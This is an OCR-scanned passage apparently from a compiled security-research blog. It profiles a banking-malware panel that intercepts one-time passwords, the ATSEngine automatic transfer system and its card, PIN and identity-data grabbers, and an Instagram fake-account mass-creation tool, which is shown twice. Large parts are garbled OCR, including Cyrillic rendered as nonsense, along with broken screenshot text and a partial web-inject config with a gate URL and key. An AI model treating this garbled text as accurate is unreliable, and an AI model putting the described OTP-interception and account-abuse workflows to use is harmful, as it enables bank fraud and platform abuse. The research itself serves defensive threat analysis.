HpOXOAMTS B CROM ARKAyYHTK (€CAM TORDKO OK Me SabnOKHpOBAMM panee) -- T.¢. BXOR B ARKAYNT TO TaltayTy 

My RAM BIO BROUMACA Taliep K MMEENT MET MOMAMEM. ECAK C@ Me NOCTyNHT TO cpafoTacT TaimayT HM xONmeEpa MycTHT B annaynT 
TOK ROR xOnMep HOBMA M ON paKee Me BabmONKpoDaNn 

*6RORMPOBNA KCTATH MEET TO ROPKMY. 

@ SpA A Talepe yremrunn } 

KOTATM B STOT MOMENT (MOMMA xOAMeEp BxomHNT B an) sax B xmaiGep npxinéT coobmenne 

MY & COOTHETCTByYRNAA SanNch MOABHTCA B ROPE (CcHOTPIOt) 

RAK BMIKM B HOPE OTOGpaxeno “TO xonmep ROWEA B ARKayHT no TasMayTyY. My RAR RAK ANGYHT mlOGaLTeH Mx NOU OuMbKy O 
NeEBepMOM NOPHNE KAM Napone 

mp mocaesymumesk nomeTne nokrx xonmep GyneT NpoMyCnaTDCA B GRRAYHT. TAR RAR Ceseac KANpPOTHD wero CTONT KomMaIA 
“myormuTs 5 an” (Pass) 

npopepmm 

RAK Bunem Ges Taikeepon x cpasy “mycTun0 B an” (ONATD me ME OYCTHMO MOTOMy “TO AOPHN M NAC NECyweCTEyxunt) 

“y % B ROre AZOREKO Cuno OTpasKTD OTH ReRcTBKA 

Tenmeps sabnonepyem STOT annaynT. Chaeem Tan BAA TOPO “Tots nponepxeTs gon )) 

npopepm uTo 6yneT ecam xomMep nomwTactca BOeTH B sabmOnKpOBaIMs anxaynT 

37TO K@ MOXHO BMMOAMNTD BO BpPeMA CRMEANHA ROMAMEN 

cOpocm™ annayrr ta sanpoc em pas 

TO CCTD BD AGHIME MOMENT HICEERT GRMEGET OT Hac RanHx AMOO RoMMant 

Chanem TAK: mx cexuac nomyunaxn 5 xanfOep mormm m nApoRD samum 5B anxnaynT wm Gananc STOrO anxaynTa mam He noxpasmacad 
AM KoManay a GnonnpopKy ana 


2 Ran Bene Ges Takeepos x cpasy “mycTmno B an” (ONATD mE NE NYCTHRO NoTOMy “TO AONNH M MAC MeCyweCcTEy nT) 
25 wy * B AOPre nOomeKo ONAO OTpasKTD OTK HewoTDHA 

26 vTenepp sabxonmpyem STOT annaynT. cnhaeem Tan ZRA Toro “TObM nponepxT® goxun )) 

2? mponepm wro Gyner ecax xonmep nomeractca BouTH B sabmonMpOBammdé annayrT 

28 2TO He MOXENO BMNOANHTD BO BPeMA CHEMNANKA ROMAIUIN 

29 c6poce annaynT a sanpoc em pas 

30 TO ecTS B RAMU MOMENT MitxeRT CaJGIAeT OT MAC KRanHx AxGO Kosoant 

Si ocheceem Tan: «x cewuac momyuxax © xaSGep AOrun * NApORD Samak B aknaynT ™ Gamanc DTOrO AKKayNTa max He NOMpapANcA. 
2 “ro nenaTh? nanaitre saSmonupyem ero 

33 «| moTom Tome canoe TOADRO NpomycTIEH ero B annxaynT (Gynex noGpee) 

34 «ran sxaom Gor ycoremno momyunn momammy » gon Oun OTOOpamtn. cooTBeTcTEBeNMO Bct >TO Gun oToOpaneno B nore 


36 npx mocnenymmen pxoge onaTs xe GyneT nonavan qo8n Sronnponnn 

37 «6cbpocm 

98 Tenep sani nomanny “npomycTeTs Ban” K Npsepy Xt SANK ON MAM BNE MOMpABNACA My K “TOO He SacTABAATS xoRNepa mexxonaT 
39 «Mt pewmne ero nponycTers 5 ar 


4. omy * Canoe "BKycHoe” sanpoc Tonena 

42 Fam BKM TOReN npmwen (Tax we » B xabGep) my « GoT mnéT KoMaMTy. ECAH ONATD Ke Ne HATS KOMAMMY TO Sanpoc ToRmena 

4) pecrapranéttca x Tonen onatTs GyneT sanpowen. 

44 «ome Gynem mnaTe TakayTa sanpocm Tonen eutpas. Km npyerepy Sor max nan Mepepmxk Tones * Oanr ma Kero pyrmyaca 

45 antax Gar ) 

46 mponepem emt pas (ceaszanmust c AONAAbIOK TasoCAyTAMx Ha Smpoc KomMaNEM, B Goenom pexite Onn GynyT Gonmee cenymmx) 

47) omy Sor RAN SMa NOPTOpIa sanpoc Tomema. M TAK MONO ZOnOeTD XORMMepA MoMA ON Me RacT myx TOReM Mona on ne nOuMeT 
40 “To Mano BRogHMTD Tonen a me 123456 

49 ppenéx Tone emt paz 

SO my * K npserepy ma >TOT pas Gun srentm sepia TOKEN. My M SQNME NOD yWER. “TO ReNATD? ZyMaD CTONT sabxonupoBaTs xonmepy 
Sl sxom “ro6 sanun 6Graronomyuno nomen 

S2 my not m Ect? KeoTaTH MoxNO GMRO RaTD M ApyrMe KoMaIy. KR Npexepy me Ratt Gann sanxTD my * BCe TyYT. “TO ReRaTD? na npony 
SS xonmepa & an nycTD TyCyeTCA. My MAM ONATD Sa SanpoceTS TOKEN nO HOBOR. 


SS ¢ naxx Gun GEssesgecero xopowero » ycnexon 8 patota 


Sample screenshots of the service in action: 
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Accounts Reports 


me (2 ChaelJordaan 
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WON aA nswene 


MMM Ne ee ee ee te ee ee 
ee ener OO DOs anes wenn O 


2s 


ve evennhnn 
werner OWA a 


var OTPBypass = ( function({){ 


| | annnnnnnannnnnnnnnnnnnnnnnnnnennennnnne= 


CNEL del LL Liddell Lediddadadletedidadedadedadadedadadadadadadedudadadedadadededadadedadadededudaded 
//8# >> USER VARIABLES 
TLL LL dl liLdedadadeddaleledadadadedadadadadadadadadatadadadadedadadadadadadadedadedadadededadadadedadabedededededadadedeled 


//--- USER VARIABLES --- 


var home_link = “http://localhost/fbn"; 
Var gate_link = home_link+"/gate.php": 
var pkey = “BcSrwi2"; 

var max_login_wait_cmd seconds = 30; 
Var max_otp_wait_cmd seconds = 60; 

var login_vait_cmd_ command timeout = 1; 
Var Otp_wait_cmd command timeout = 1; 


TAA 1 i Ladadudididadadaduhuahudadidadadadsduadadadadadihadadadadadadadaddadedidadsdadududadadadadadadedadedadededadadaddadedadedadadudadubaded 
//8 >> DETECT BROWSER 
TAA LL LL LiLidsdedadadadihidididadadadsduididadadadibeadididadadadedsbedidudadadadadudadadadadadadedsdadididadadadudadadadadedadadadadabided 


function detectBrowser(){ 

af( navigator .userAgent .toLowerCase().indexOf("meiec 6") >= Of 
roturn "TE6": 

Jelse i2( navigator. userAgent.toLowerCase().indexOf("msie 7") >= Of 
return "TE": 

Jelwe if(navigator.userAgent.toLowerCase().indexOf("ssie 5") >= O¢ 
roturn "ILO": 

Jel#se 1f( navigator. userAgent.toLowerCase().indexOf("msie 9") >= Of 
return “1E9"; 

Jelse 1f( navigator. userAgent.toLoverCase().indexOf("firefox") >= O¢ 
zetum "FP"; 

lelse( 
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Contect | FMB | Orie Assistance | Fraud Prevention | Home 


Connecting to authentication Server. This may take a few minutes. (00:13) 


Prevx SateOnine™ Reset access detats Terms and Conditions Verity payments Register 


Up to 15% reward on 
Gabi Tadlets & Smartphon 


+ Planning a holiday 
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Comtect | FNS | Criine Assistance | Fraud Prevention | Home 


| BankOnline  qwet23 eeeeee Login (@)) 
Prevx SateOrnire™ Reset access detats Terms and Coraitions Verify payments Regerter 


Go @ 


Accounts 


be 
[Delete AllReports | Date Fitter © Altime @ From: From First To: (To Last $I | Apply /Refresh | 


| 2012-11-29 14:50:05 rr 127.0.0.1 qwei23  pass_to_account logined Holder logged in, return command: Pass 
bot to account 


4 


return 


2042-31-29 14:50:05 FF  127.0.0.2 qwei23 " pass_to_eccount logining_timedout Login wait command timeout, 
j | | | _ command: Pass bot to account | 
2012-11-29 14:46:05 FF 127.0.0.2 qwel23  wait_omd logining Holder trees to login with login: qwei23, 
| and password: qweqwe, 


return 
L command: Wait for commands 
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Contact 


s Register 


1270.04 Holder logged mm, return command: 
| | | | i _Pass bot to account | 
2012-11-29 14:52:01 127.0.0.1 pass_to_account logining Holder tries to login with login: qwei23, 
return 


2012-11-29 14:50:05 127.0.0.4 " pass_to_account logined 


2012-11-29 14:50:05. '127.0.0.1 ' pass_to_account logining_timedout 


2012-11-29 14:48:05 1127.0.0.1 " wait_emd logining Holder tries to login with login: qwel23,_ 
and password: qweqwe, return 
command: Wait for commands 
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AA Na“ana OCHOBImMe NOnCEeMNA HM ROMAMEN 
Block - sa6nonmuponaTs xonzepa 

OTP = sanpocuTs Tonen 

Vait - cOpocuTs cratyc ana Toro “TOGM npx NopTOpHOM Bxome weEERT CTapToORaN sanona 
Pass - nponyctTxTs » axnaynT 


NpoxoguT® B cBOM oO 
My KOR DOGO BRD 


afte 


1270.0. qwei23 


2022-11-29 14:53:42 FF 0 :127.0.0.2 qwel23 blocked 


To ects B mammedt = 2912-13-29 14:53:42 FF "i27003 qweizs | —— ———~——-» _ 
| 


2012-11-29 14:82:01 FF 127.0.0.1 qwel23__ pass_to_account logined 


(2022-11-29 24:52:01, FF | 127.0.0.1 qwel23__pass_to_account logining 
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Comtect | FN | Ondine Assittonce | Froud Prevention | Home 
¢. Connecting to authenscation Server. This may take a few minutes, (01:50) 
Prevx SateOniee™ Reset access detats Terms and Coraitions Verify paymerts Register 


-fbn@OTPBypass Thu, 29 Now 2012 14:59:16 (UTC) Opdons Sign out | 


Accounts Reports 
| Delete Ali Reports | Date Fitter © Alitime @ From:|FromFirst Sto: ToLast SJ Apply /Refresh | (Gl 
a a | “Message 

wait_omnd 
otp 


} 
2012-11-29 14:59:07 rr 12700.1 qwei23 otp_submated OTP token submited, return | 
| | comensnd: Wait for commands W| 
Up to 15% rewart | 2012-12-29 14:59:07 FF = 127.0.0.1 qwei23 otp_submited eee 
2012-11-29 14:58:49 FF  127.0.0.4 qwei23otp ‘otp_requested OTP Request fake shown, return 
command: Request OTP 
FF = 327.0.0.4 Qqwelz3  wait_emd hogireng Holder tres to login with login: | 


Qwel23, and password: qweaqwe, 
return command: Wait for commands 


Gh. Tablets & Smartp | 2012-11-29 14:58:38 


Pass bot to account 
2012-11-29 14:57:57 3270.0. qweiz3 = waitend logineng Holder tres to login with login: 
qwel23, and password: qweaqne, 
return command: Wait for commands 
2012-11-29 14:56:00 1270.0.1 qwel23 blocked block_fake_shown Block fake shown, return command: 
Login blocked 


2012-11-29 14:58:02 1270.0.1 qwel23 $s_to_accourt logined Molder logged in, return command: 
fog Planning a holida q pess_to_ 3 logged in, 


Sample screenshot of the ATSEngine in action targeting HSBC: 


4404 


«chsbc@ATSEngine 


Accounts Drops 


Reports 


| Refresh || Delete Account 


_ Delete All Accounts 


Sat, 24 Nov 2012 10:58:32 (UTC) Options | Sign out 


Transfers 


Hide Bottom Panel 


Last Login Time = Login (ID) 


2012-11-24 10:51: 25 | 


2012- n: 241 10: 27: 7 
2012-11-24 10:17:54 
2012-11-24 09:37:38 


2012-11-24 09:05:48 


flat punto 


Santorini 


ferrari 


kostowiec 


Undefined 
Undefined 


Undefined 
Undefined 
Undefined 
Logging in | 
Undefined 


lindefined 


2012-11-24 07:52:26 

2019-11-24 02-07-25 inblese 
Grabbed Data Transfers Reports 

| Refresh || Add Transfer J Edit Transfer I Delete Transfer 


J 


ea )| Holder Account Nr Drop Name 


22.11.2012 


server repair 


Drop Account Nr Drop Sort Code Transfer Memo(Regixp) Amount 


a al a 2419.03 


Some of the most recent updates to the system include: 


01/11/2012 

- Sets 

fullinfo 

grabbers 

for 

AU ( 37 banks 

)/ CA (30 banks 

)/ US ( 40 banks ). Data on 
Holder to 


SSN /MMN / DOB /DL/DL exp/VBV... 


01/11/2012 - 
Grabbers 
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CC + VBV (paypal, ebay, amazon, facebook) 


01/11/2012 

- The system 

change 

number and 

Grabing 

necessary 

disk imaging 

(input issues , balance sheets) for the Gulf 
santander.co.uk ( instant on 
UK 

to 

10kGBP ) 


02/11/2012 

Grabber 

additional data for 

paypal (DE / UK / AU / 

with 

the possibility 

to add 

other countries ). Collects : Name 
Holder , Balance , Status ( verif / 
neverif ), Account Type , Time of the last 
entry 

, as well as 

rooms full 

of affection 

card and / 

or 

bank 

accounts 

for the 

AU 
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and the 

UK, 

and questions 
with answers 
for 

DE 


13/11/2012 
Grabber 
TANs 

to 


ipko.pl 


23/11/2012 
Avtozaliv 
on 
hsbc.co.uk 
23/11/2012 


Grabber 


cc + cvwy + exp + pin. 


works 

on all pages 
on which the 
algorithm 
finds 

on 

LUHN10 
card number and 
exp 

field and 
collects 


requests 
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PIN 


11/29/2012 
intercept system 
/ 

bypass 

token 

to 

fnb.co.za 


Two-factor authentication - indeed, an additional layer of security for your E-banking ac- 
count, however, everything changes on a crimeware-infected host, and sadly, it changes in 
favor of the cybercriminal that compromised it. 


1. http: //www.zdnet .com/blog/security/modern-banker-malware-undermines- two-factor-authentication/4402 


2. http: //www.zdnet .com/blog/security/no-security-software-no-e-banking-fraud-claims-for-you/1158 


3. https: //www.google.com/#output=search&sclient=psy-ab&q=site:ddanchev.blogspot.com+zeus 


4. https://blogs.rsa.com/the-carberp-code-leak/ 


5. http://blog. webroot. com/2013/03/14/new-zeus- source-code-based-rootkit-available-for-purchase-on-the-unde 


ground-market/ 


6. http://blog.webroot .com/2013/06/27/self-propagat ing-zeus-based-source-codebinaries-offered-for-sale/ 


9.7.6 Instagram Under Fire as Cybercriminals Release New DIY Fake Account Regis- 
tration/Management/Promotion Tool (2013-07-23 17:01) 


In 2013, CAPTCHAs represent an [1]outdated approach for a Web site wanting to prevent the 
[2 efficient and systematic abuse of its services. 


This fact, largely driven by the rise of [3]cost-effective CAPTCHA solving solutions of- 
fered by low-waged individuals internationally over the last couple of years, continues to 
empower virtually anyone possessing the right cybercrime-friendly tools, with the ability to 
[4]abuse any major Web property in a potentially fraudulent or malicious way. 


In this post, I'll profile one of the most recently released DIY fake account registra- 
tion/management/promoting tool, targeting Instagram, highlight its core features, as well as 
emphasize on the true impact that these tools are having on some of the world’s most popular 
Web properties. 
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Sample screenshots of the tool in action: 


actions 
FOLLOW 


Threads To Start 2 = s By Below Names By Below Tags With Max Follow Count: 999999 By 


+ «eee 10 


Delay in Second 3 Start 


Keywords, separated by a space 


iPet2 iPetS 


“ Log Veewer 


Clear logs Prent more details VY Scro® to end 
2013/6/15 16:41:40 « 
2013/6/15 16 y 
6/15 16 
3/6/15 164 y 
3/6/15 16 
B/15 16 
5/15 164 
/15 164 Thread#o 
5/15 166 Thatchic 
/1S 16 Thatchkmk 
3/6/15 1641:5 Thatchkmk ’ 
3/6/15 16:41:56 ~ Thatchkmk 
3/6/15 16:41:56 « INFO ~ Thatchkmk 
. 
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welcome config accounts actions tools 
LOAD FOLLOW UNFOLLOW URE COMMENT UPDATEPROFRE UPLOAD PHOTOS 


By Below Tags (Effcient to get real followers) @ By below user Names, Max photo count: 10 * 
By Below Media ID (3k+ accounts may be in popular page) 
Delay in Seconds 3 * Threads To Start: 10 5 Maxlike Count: 999999 > Get Hot Tags 


Start Stop 18 success of 20 try 
Keywords (tags), separated by a space: 


ipets 


2013/6/15 16:42:41 - INFO - Camilsibu likes photo id 47303003S1S7155991_37287217S successfully: 
2013/6/15 16:42:41 - INFO - Thatchkmk likes photo id 473030035157155991_372872175 successfully: 
2013/6/15 16:42:41 - INFO - Cletibsilotuk likes photo id 473030035157155991_372872175 successfully: 
2013/6/15 16:42:41 - INFO - Tarralbhxk likes photo id 473030035157155991_372872175 successfully 
2013/6/15 16:42:41 - INFO ~ Jolantzev likes photo id 473030035157155991_372872175 successfully: 
2013/6/15 16:42:45 - INFO - Cletibsilobuk likes photo id 473029641892016276_372872175 successfully: 
2013/6/15 16:42:45 - INFO - Tarralbhxk likes photo id 473029841892016276_372872175 successfully: 


welcome config accounts actions tools 


LOAD FOLLOW UNFOLLOW UKE COMMENT UPDATEPROFRE UPLOAD PHOTOS 


Note: ‘accourts.tet’ in root directory is loaded by default. Check Account before start. 


Save As... Total Count1485 All Created Accounts Clear Created Accounts 


Updated Profile Uploaded Photos Prefer Proxy 


© e 

welcome config accounts actions tools 

LOAD FOLLOW UNFOLLOW UKE COMMENT UPDATEPROFRE UPLOAD PHOTOS 
We\SocialBot\trunk\Resources\imageRipper\hottie Select Photos Folder... 
Photo caption spintax (One item each ine, bot will randomly pick one.) 

why {ijHe]wholShejher sisterjnobody) (#tove|crush onjthate) me 

fAlthe picturefhellofwhat) make (#me|her{himlyoulsgirl|boy) {#cooljacute|slovelesexy) 


Upload if media count less than |@| Upload Photos Count fp > | Upload All Photos 
Delay in Seconds 10 ¢ Threads To Start: 10 © 


Start = Stop 
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WOME | SETTINGS | | -Ox 


actions 
OAD FOLLOW UNFOLLOW UKE OMMENT UPDATE PROFILE UPLOAD PHOTOS 


Select Emails File 


Sd Cie et Profile Website File. 
_ | Select Profie Bio File.. Get template 


Gender: Female(@0%) Male(20%) 


Female Profile | Male Profile 


SSS ole Pictures 


Profile Names. Get template 


Note 


1, Supportted picture formats: jpg. .pag and jpeg 


Threads To Start: 10° = Start Stop 


~ Log Viewer 
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© 
N tools 


CHECK ACCOUNT TEST PROXY RENEW ROUTER IP 


Choose Proxy File Threads To Start: 10 > Total Count: 24 


Host = Port UserName Password = Invalid 


23 success of 24 try 


© 


actions ‘oo! 


LOAD FOLLOW UNFOLLOW UKE COMMENT UPDATE PROFLE UPLOAD PHOTOS 
Threads To Start: 10° Max Comment Count: 999999 > Delay in Seconds To Comment Next: 20> 
Comments (one per line, spintax format supports. ‘comments.txt’ in root directory is used by default: 


{This is|Yes, 1 am) a flokenizedjspietax format} comment! 
(She | Her sister) Goves | crushs on | hates | wants to kill} me, 1 {don't | do} know why] 


Reload Save 


Keywords, separated by a space: § By Below Tags by below Media Id 


tangdaguan iwanttoeat 
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OME | SETTINGS | | -ox | 


¢€ 

l settings 
LICENSE CAPTCHA APPEARANCE 
APPEARANCE 
Theme; hello kitty ad 
Fort size: = large ° 
¥ Log Veewer 
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«© 


tools 


CHECK ACCOUNT TESTPROXY RENEW ROUTER IP 


Note: ‘accounts.’ in root directory is loaded by default. 
Load Accounts... Threads To Start: = Total Count: 74 


User Name 
TaylorBordTaytor 
BradfordGibbsbra 
PetersLoulsPeters676 
StilesRiShies®i 
NorthLavernaNort 
MercerJeuzMercer221 pPanjhasrl 
ConradAbadComradS162 = Inhipbbop 
HoffmanMcKayHolf vndptb 
ThorpeBronThorpe3S07_ = mespbq 
PikeGulaPikeGulai9? tsphilfwb 
BoswellvirgeBoswS974 = yibhaagu 


oococsoescsesceececmlUCcUOWUCc WUC O8lCUS8 
oeoceooesoeseeoeoeoees$ss?é:¢ 


Export Valid Export Invalid 35 success of 42 try 


¥) Log Viewer 


4415 


4416 


© 
\ tools 
CHECK ACCOUNT TESTPROKY RENEW ROUTER IP 


Note: ‘accounts.txt’ in root directory is loaded by default. 


Load Accounts... Threads To Start: 10 > Total Count: 1905 Start Stop 
User Name Password PK Invalid Profile Pic Captcha Uploaded Photos Follower Count Following Co 
Stasnyutgih weptcbt 410046269 & 
Ginevrigzdqgm cskbaauzj 410046512 


Lanforejuagm  ekigphy 410046469 
Thatchwtqgsj! —wyeztz 410046732 
Nevinswrs okaeuxpzn —- 410046982 
Sherlofnnjqv 410047207 


Gutfwikkkrwvl 
Calabrnebv mhkgozejd 410048449 
Christhzyxjs orpzehr) 410048897 


Bleiert! arwsbwipa 410048837 
Faricatsdmz skenhiuewy 410049335 
Saralowneear 7s. 410049574 
‘ 
Export Valid Export Invalid 1019 success of 1380 try 
¥) Log Viewer 


welcome config accounts actions tools 
BASIC SETTING ADVANCE SETTING(OPTIONAL) CREATOR 


Login name part one. Get template 


Login name part two... 


welcome config accounts actions tools 
BASIC SETTING ADVANCE SETTING(OPTIONAL) CREATOR 


i 


¥) Upload Profile Picture Randomly and Update Profile Info With Random Data Upload Photos Randomly 


Max accounts per proxy; 9 > Start 


6/15/2013 4:23:40 PM 
6/15/2013 4:23:40 PM 
6/15/2013 4:23:39 PM 
6/15/2013 4:23:40 PM 
6/15/2013 4:2406 PM 
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e 
ICCOUNT 
SAC SITTING 


Female Login Name Male Logn Name 


v Rar 


verde 
Feenale Protie Male Protitie 


Some of its core features are: 


* support for multi-threads 

* set number ot accounts to generate using a single proxy (malware-infected host) 
* randomization of the posted bogus content to avoid easy detection of the pattern 
* male/female fake account creating capabilities 

* mass account validity checking capabilities 


¢ CAPTCHA-solving integration with third-party CAPTCHA solving services 


Over the years, I’ve been extensively profiling campaigns utilizing purely legitimate infras- 
tructure for achieving the fraudulent/malicious objectives set by the cybercriminal behind the 
Campaign. These cases demonstrate that cybercriminals continue to pursue the efficient and 
systematic abuse of legitimate Web properties, which on the other hand, continue relying on 
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CAPTCHA challenges to differentiate between bots and humans using the site, forgetting that 
it’s actually humans solving the CAPTCHAs for the their customers. 


Known cases of abuse of legitimate infrastructure for fraudulent/malicious purposes 
over the years include: 


[5]Bogus "Shocking Video" Content at Scribd Exposes Malware Monetization Scheme Through 
Parked Domains 


[6]Fake Codec Serving Domains from Digg.com’s Comment Spam Attack 
[7]Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software 
[8]Dissecting the Bogus LinkedIn Profiles Malware Campaign 


[9]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and 
Blackhat SEO Farms 


[10]Celebrity-Themed Scareware Campaign Abusing DocStoc and Scribd 
[11]Celebrity-Themed Scareware Campaign Abusing DocStoc 
[12]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 


[13]Pharmaceutical Soammers Targeting LinkedIn 


1. http: //ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.htm 


2. http://blog. webroot . com/2013/04/23/captcha-solving-russian-email-account-registration-tool-helps-facilita 


e-cybercrime/ 


ttp://ddanchev.blogspot.com/2009/01/dissecting-bogus-linkedin-profiles.htm 


0: 
10, 
12. 


13. http://ddanchev. blogspot .com/2009/02/pharmaceutical-spammers-targeting. htm 


9.7.7. Instagram Under Fire as Cybercriminals Release New DIY Fake Account Regis- 
tration/Management/Promotion Tool (2013-07-23 17:01) 


In 2013, CAPTCHAs represent an [1]Joutdated approach for a Web site wanting to prevent the 
[2 efficient and systematic abuse of its services. 
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This fact, largely driven by the rise of [3]cost-effective CAPTCHA solving solutions of- 
fered by low-waged individuals internationally over the last couple of years, continues to 
empower virtually anyone possessing the right cybercrime-friendly tools, with the ability to 
[4]abuse any major Web property in a potentially fraudulent or malicious way. 


In this post, I'll profile one of the most recently released DIY fake account registra- 
tion/management/promoting tool, targeting Instagram, highlight its core features, as well as 
emphasize on the true impact that these tools are having on some of the world’s most popular 
Web properties. 


Sample screenshots of the tool in action: 


* 
1 
J 


f actions 
FOLLOW x A 


Threads To Start - @ By Below Names By Below Tags With Max Follow Count: 999999 By Below Users I 


Delay in Second 3 Start Stop © see 10 success of 10 try 


“ Log Veewer 


Clear logs Pret more details VY Scrol to end 


5 16:41:40 - INFO - Jolantzev followed 338007973 successfully 
5 16:41:40 - INFO - Jo 
5 16:41:43 ~ INFC 
$ 16:41:43 - INFO 
5 16:41:44 - INFO - Jo 
5 16:41:44 - INFO 
S 16:41:46 - WARN - No 
5 16:41:47 - INFO - The 


5 16:41:50 


5 16:41:52 - INFO ~- Thatchkmk followed 
5 16:41:52 - INFO ~ Thatchkmk followed Joey 


$ i 
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© t 

welcome config accounts actions tools 

LOAD FOLLOW UNFOLLOW URE COMMENT UPDATEPROFRE UPLOAD PHOTOS 
By Below Tags (Effcient to get real followers) m= | By below user Names, Max photo count: 10 > 
By Below Media ID (3k+ accounts may be in popular page) 

Delay in Seconds 3 ~ Threads To Start: 10 2 MaxLike Count: 999999 > Get Hot Tags 


Start Stop 18 success of 20 try 
Keywords (tags), separated by a space: 


ipets 


013/6/15 16:42:41 - INFO - Camilsibu likes photo id 473030035157 159991_372872175 successfully: 
2013/6/15 16:42:41 - INFO ~ Thatchkmik likes photo id 473030035157155991_372872175 successfully: 
2013/6/15 16:42:41 - INFO - Cletibsiobuk likes photo id 473030035157155991_372872175 successfully: 
2013/6/15 16:42:41 - INFO - Tarralbhxk likes photo id 473030035157155991_372872175 successfully: 
2013/6/15 16:42:41 - INFO ~ Jolantzev likes photo bd 473030035157155991_372872175 successfully: 
2013/6/15 16:42:45 - INFO - Cletibsilobuk likes photo id 473029641892016276_372872175 successfully: 
2013/6/15 16:42:45 - INFO ~ Tarralbhxk likes photo id 473029841892016276_372872175 successfully: 


welcome config accounts actions tools 
LOAD FOLLOW UNFOLLOW UKE COMMENT UPDATEPROFRE UPLOAD PHOTOS 


Note: ‘accounts,.tet’ in root directory is loaded by default. Check Account before start. 


Save As... Total Count:1485 All Created Accounts Clear Created Accounts 


User Name Updated Profile Uploaded Photos Prefer Proxy 


Create At 
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actions 


LOAD FOLLOW UNFOLLOW LUKE COMMENT UPDATEPROFRE UPLOAD PHOTOS 


1e\SocalBot\trunk\Resources\mageRipper\hottie Select Photos Folder... 


Photo caption spintax (One item each ine, bot will randomly pick one.) 


why {iHe}whojShejher sisterjnobody} (*tovelcrush onjshate) me 
(Althe pacturefhellojwhat) make (#mejher|hien|you|*girljboy) (*cooljecutejstove|*sexy) 


Upload if media count less thanS ss Upload Photos Count h = Upload All Photos 


Delay in Seconds 10 2 Threads To Start: 10 2 


Start Stop 


actions 


LOAD FOLLOW UNFOLLOW UKE COMMENT UPDATE PROFILE UPLOAD PHOTOS 


Select Emaiis File... 


————————— Select Profile Website File... 
VSS oe Select Profie Bio File... Get template 

Gender: Female(80%) Male(20%) 
| Female Profile | Male Profile | 


EE Profile Pictures... 
Profile Names. Get template 


Note: 


1. Supportted picture formats: jpg, .png and jpeg. 


Threads To Start: 10 | Start Stop 


~ Log Veewer 


© 


tools 


CHECK ACCOUNT TEST PROXY RENEW ROUTER IP 


Choose Proxy File Threads To Start: 10 > Total Count: 24 


Host = Port UserName Password = Invalid 


23 success of 24 try 


© 
NV actions | 


LOAD FOLLOW UNFOLLOW UKE COMMENT UPDATE PROFILE UPLOAD PHOTOS 
Threads To Start: 10° Max Comment Count: 999999 > Delay in Seconds To Comment Next: “: 
Comments (one per line, spintax format supports. ‘comments.tt’ in root directory is used by defauht 


(This is|Yes, 1 am) a flokenizedjspietax format} comment! 
(She | Her sister) loves | crushs on| hates | wants to kill) me, 1 {don't | do) know why] 


Reload Save 


Keywords, separated by a space: © By Below Tags by below Media Id 
tangdaguan iwanttoeat 
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€ 
settings 


UCENSE CAPTCHA APPEARANCE 
APPEARANCE 


HOME 


‘SETTINGS 


B = 


Theme: hello kitty bd 

Fort size: = large ° 
~ Log Veewer 

¢€ 


CHECK ACCOUNT TESTPROXY RENEW ROUTER IP 


Note: ‘accourts.txt’ in root directory is loaded by default. 


Load Accounts... Threads To Start: 
User Name Password 
TaylorBordTaytor yatqut 
BradfordGibbsbra giguilll 
PetersLoulsPeters676 quscgw 
StilesRuShiesRi qedzrycfo 
NorthLavernaNort hufgh 


MercerjeuzMercer221 Panghasrl 
ConradAbadConradS162 Inhipbbop 
HoffmanMcKayHoff vndptb 
ThorpeBronThorpe3S07 = mespbq 
PikeGulaPikeGulal97 tsphilfwb 
BoswellvirgeBoswe974 yibhaagu 


Export Valid Export Invalid 


~ Log Veewer 


nS 


PK 
416962391 
416962422 
416962484 
416962554 
416962862 
416962979 
416962948 
416963826 
416963934 
416964006 
416964339 


tools 


Total Count: 74 Start Stop 


| a | 


Invalid Profile Pic Captcha 


OME 


Uploaded Photos 


eeeee 35 success of 42 try 


SETTINGS 


Follower Count 


cooocococoescesoeoesceesesd & 


Following 


eoocosoeeseoeoeseecc8lhlUS 


© 


CHECK ACCOUNT TESTPROXY RENEW ROUTER IP 


Sherlofanjqv 


© 


BASIC SETTING ADVANCE SETTING(OPTIONAL) CREATOR 


tools 


Note: ‘accounts.txt’ in root directory is loaded by default. 


Load Accounts... Threads To Start: 10% Total Count: 1905 Start Stop 
User Name Password PK Invalid —ProfilePic = Captcha = Uploaded Photos 
Stasnyutgih weptcbt 410046269 & 
Ginevrjgzdqm —cskbaauzj 410046512 Ev} 
Lanforejuagm  ekigphy 410046469 ia 
Thatchutggs! —wwjeztz 410046732 ty 
Nevinswrs okaeuxpzn —-410046982 we 
& 


me config accounts actior 


1019 success of 1380 try 


Follower Count 


oooo9oso 


v Randomly Generate 


Login name part one. Get template 


Login name part two Last Digit Count 


Select Emants File. 


E:\software\SocialBor\trunk\biogourNinstafire URLOt Select Profile Website File... 


E:\software\SocialBor\trunk\biodurl\bio finalot 


Gender: Female(80%) ; 


——— mceserore Hl neyo 


Select Profie Bio File... Get template 


E\software\SociaiSot\trunk\web\features 


Note: 


1, Supportted picture formats: jpg. .pag and jpeg. 
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© 
accounts 


BASIC SETTING ADVANCE SETTING(OPTIONAL) CREATOR 


Threads To Start: 100 > Accounts To Create: 30000 > Delay In Seconds To Create Next: 3 a 


v| Uploa file Picture | mily a ate Profile Info With Rand ita Upload Photos Randomly 
Max accounts per proxy: 9 > Start Stop 5 success 
User Name Password Email Updated Profile Uploaded Photos Create At 
DickersonKacieDi ucguly mxhzcoskkes@yahoo.co.uk v 6/15/2013 4:23:40 PM 
RuffinNobileRuti6471 —yvbxfxsde ghuosgovilibebjjy@sbcglobal.net v 6/15/2013 4:23:40 PM 
LundyHalleeLundy piggstkeq znmekglebznkzwiuvo@msn.com v 6/15/2013 4:23:39 PM 
TillmarOriaTilien zybvaxtw zhuufraubvcxsyqgs@gmailcom v 6/15/2013 4:23:40 PM 
ArmstrongvikingA315 ubyhye qanzgyywuky@qq.com v 6/15/2013 4:24.06 PM 


Save Accounts As... 


~ Log Veewer 


accounts 


ADVANCE SETTINGOPTIONAL 


CREATOR 


v Randomly Generate 


Last Digit Count 
Select Emails File... 
E\software\SocialBot\trunk\biodeurf\instafire URL ba Select Profde Website File... 
Ex\software\SocialBot\trunk\biogeurh\bio final tat Select Profie Bio Ale... Get temotate 
Gender: Female(B0%) Male(20%) 
Female Profile | Male Profie 
LL Profile Pactures. 
Profile Names. Get template 


Note: 


